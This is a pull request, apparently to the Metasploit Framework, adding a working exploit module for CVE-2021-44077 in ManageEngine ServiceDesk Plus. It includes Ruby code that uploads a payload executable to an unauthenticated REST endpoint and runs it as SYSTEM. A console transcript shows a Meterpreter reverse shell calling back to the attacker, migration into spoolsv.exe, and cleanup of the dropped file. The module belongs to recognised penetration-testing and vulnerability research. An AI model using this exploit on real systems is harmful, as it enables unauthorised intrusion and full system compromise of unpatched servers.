### PR TITLE
Add ManageEngine ServiceDesk Plus CVE-2021-44077 exploit

### DIFF
--- a/documentation/modules/exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077.md
+++ b/documentation/modules/exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077.md
@@ -1,0 +1,95 @@
+## Vulnerable Application
+
+### Setup
+
+Follow the [Installing ServiceDesk Plus] guide, in particular [Installation on Windows]. You can skip licensing.
+
+1. Download [ManageEngine_ServiceDesk_Plus_64bit.exe]
+1. Run the installer
+1. Start the server
+1. Hax
+
+Note that build 11305 is not an exploitable build, so don't download that.
+
+[Installing ServiceDesk Plus]: https://help.servicedeskplus.com/installing-servicedesk-plus
+[Installation on Windows]: https://help.servicedeskplus.com/introduction/installation-and-getting-started.html
+[ManageEngine_ServiceDesk_Plus_64bit.exe]: https://archives.manageengine.com/service-desk/11301/ManageEngine_ServiceDesk_Plus_64bit.exe
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+## Scenarios
+
+### ServiceDesk Plus 11301 on Windows Server 2016
+
+```
+msf6 > use exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077
+[*] Using configured payload windows/x64/meterpreter_reverse_tcp
+msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > options
+
+Module options (exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter_reverse_tcp):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   EXTENSIONS                   no        Comma-separate list of extensions to load
+   EXTINIT                      no        Initialization strings for extensions
+   LHOST                        yes       The listen address (an interface may be specified)
+   LPORT       4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Dropper
+
+
+msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > set rhosts 172.16.57.222
+rhosts => 172.16.57.222
+msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > set lhost 172.16.57.1
+lhost => 172.16.57.1
+msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > run
+
+[*] Started reverse TCP handler on 172.16.57.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. /RestAPI/ImportTechnicians is present.
+[*] Uploading msiexec.exe
+[+] Successfully uploaded msiexec.exe
+[*] Executing msiexec.exe
+[!] Yo, don't forget to clean up ..\bin\msiexec.exe
+[*] Meterpreter session 1 opened (172.16.57.1:4444 -> 172.16.57.222:50095 ) at 2021-12-23 11:28:47 -0600
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-PRMQDT3BCJI
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > pwd
+C:\Program Files\ManageEngine\ServiceDesk\site24x7
+meterpreter > migrate -N spoolsv.exe
+[*] Migrating from 4816 to 1728...
+[*] Migration completed successfully.
+meterpreter > rm 'C:\Program Files\ManageEngine\ServiceDesk\site24x7\..\bin\msiexec.exe'
+meterpreter >
+```

--- a/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb
+++ b/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb
@@ -1,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',
+        'Description' => %q{
+          This module exploits CVE-2021-44077, an unauthenticated remote code
+          execution vulnerability in ManageEngine ServiceDesk Plus, to upload an
+          EXE (msiexec.exe) and execute it as the SYSTEM account.
+
+          Note that build 11305 is vulnerable to the authentication bypass but
+          not the file upload. The module will check for an exploitable build.
+        },
+        'Author' => [
+          # Discovered by unknown threat actors
+          'wvu', # Analysis and exploit
+          'Y4er' # Additional confirmation
+        ],
+        'References' => [
+          ['CVE', '2021-44077'],
+          ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],
+          ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],
+          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],
+          ['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],
+          ['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],
+          ['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup
+        ],
+        'DisclosureDate' => '2021-09-16',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          ['Windows Dropper', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8080,
+          'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')
+    )
+
+    unless res
+      return CheckCode::Unknown('Target failed to respond to check.')
+    end
+
+    # NOTE: /RestAPI/ImportTechnicians was removed after build 11303
+    unless res.code == 200 && res.get_html_document.at('//form[@name="ImportTechnicians"]')
+      return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')
+    end
+
+    CheckCode::Appears('/RestAPI/ImportTechnicians is present.')
+  end
+
+  def exploit
+    upload_msiexec
+    execute_msiexec
+  end
+
+  def upload_msiexec
+    print_status('Uploading msiexec.exe')
+
+    form = Rex::MIME::Message.new
+    form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name="step"')
+    form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',
+                  'form-data; name="theFile"; filename="msiexec.exe"')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),
+      'ctype' => "multipart/form-data; boundary=#{form.bound}",
+      'data' => form.to_s
+    )
+
+    unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')
+      fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')
+    end
+
+    print_good('Successfully uploaded msiexec.exe')
+  end
+
+  def execute_msiexec
+    print_status('Executing msiexec.exe')
+
+    # This endpoint "won't" return
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),
+      'vars_post' => {
+        'execute' => 's247AgentInstallationProcess'
+      }
+    }, 0)
+  end
+
+  # XXX: FileDropper dies a miserable death if the file is in use
+  def on_new_session(_session)
+    super
+
+    # Working directory is C:\Program Files\ManageEngine\ServiceDesk\site24x7
+    print_warning("Yo, don't forget to clean up ..\\bin\\msiexec.exe")
+  end
+
+end


### PR DESCRIPTION
```
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > info

       Name: ManageEngine ServiceDesk Plus CVE-2021-44077
     Module: exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077
   Platform: Windows
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-09-16

Provided by:
  wvu <wvu@metasploit.com>
  Y4er

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits CVE-2021-44077, an unauthenticated remote code
  execution vulnerability in ManageEngine ServiceDesk Plus, to upload
  an EXE (msiexec.exe) and execute it as the SYSTEM account. Note that
  build 11305 is vulnerable to the authentication bypass but not the
  file upload. The module will check for an exploitable build.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-44077
  https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above
  https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021
  https://www.cisa.gov/uscert/ncas/alerts/aa21-336a
  https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/
  https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis
  https://xz.aliyun.com/t/10631

msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) >
```